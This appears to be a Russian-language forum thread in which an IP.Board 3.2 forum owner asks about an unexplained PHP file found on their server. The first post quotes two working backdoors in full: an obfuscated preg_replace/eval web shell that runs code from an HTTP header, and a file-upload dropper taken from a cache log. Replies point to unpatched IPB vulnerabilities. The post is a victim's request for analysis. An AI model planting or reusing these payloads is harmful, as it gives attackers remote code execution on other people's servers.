Jump to content

Непонятный PHP-файл, который появился сам в IPB 3.2

Featured Replies

Posted
comment_77568

Здравствуйте!

 

Обнаружил PHP-файл, который не загружал на сервер, а также которого нет в исходном дистре IPB 3.2. Файл называется 5c258130.php.

 

Файл нашел в 2 местах, содержимое отличается:

 

В корне:

<?php $_a3dc="x70x72x65x67x5fx72x65x70x6cx61x63x65";$_a3dc("x7cx2ex7cx65","x65x76x61x6cx28x27x65x76x61x6cx28x62x61x73x65x36x34x5fx64x65x63x6fx64x65x28x22aWYobWQ1KCRfU0VSVkVSWydIVFRQX1FVT1RFJ10pPT0nZTY2ZTZjYWRkNmUxM2VmZWE1NGVkNTBjMGViMmQzMmInIGFuZCBpc3NldCgkX1NFUlZFUlsnSFRUUF9YX0NPREUnXSkpIEBldmFsKEBiYXNlNjRfZGVjb2RlKHN0cnJldihAJF9TRVJWRVJbJ0hUVFBfWF9DT0RFJ10pKSk7x22x29x29x3bx27x29",'.');?>

В папке cache:


==============================================================================
 URL: /index.php/index.php
 Date: Tue, 20 Nov 2012 10:16:53 +0000
 IP Address: 31.3.250.226
 Time Taken: 0.04346
 <?php file_put_contents(@$_SERVER[HTTP_FILENAME],base64_decode(@$_SERVER[HTTP_DATA]));echo md5(12345);?>

==============================================================================
==============================================================================
=========================        END       ===================================
========================= /index.php? ===================================
==============================================================================

IP-адрес Великобритании. Я там никогда не хостился и сам из тех сетей не ходил.

 

Сам не программер, оценить код PHP не могу. Тем более, что первый выглядит как упакованный или как какой-то брутфорсер.

 

Внимание, вопросы:

 

1. Что это такое?

2. Как могло попасть (данные для входа никто не имел, пароли все мегастойкие)?

3. Что оно делало?


Точная версия борды:

 

IP.Board Version 3.2.0 (ID:32003)

Edited by EIKA

comment_77575

бессмысленные посты не нужно писать. 

Почему бессмысленные? IPB 3.2 забита уязвимостями 

comment_77587

Почему бессмысленные? IPB 3.2 забита уязвимостями 

ТС спрашивает о файле, а не о том, как защитится. 

  • Author
comment_77603

Обновляться буду, но позже, ибо тут немного дизайн подпилен, уже не помню где и что я там пилил...

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.


Guest
Ответить в этой теме...

Последние посетители 0

  • No registered users viewing this page.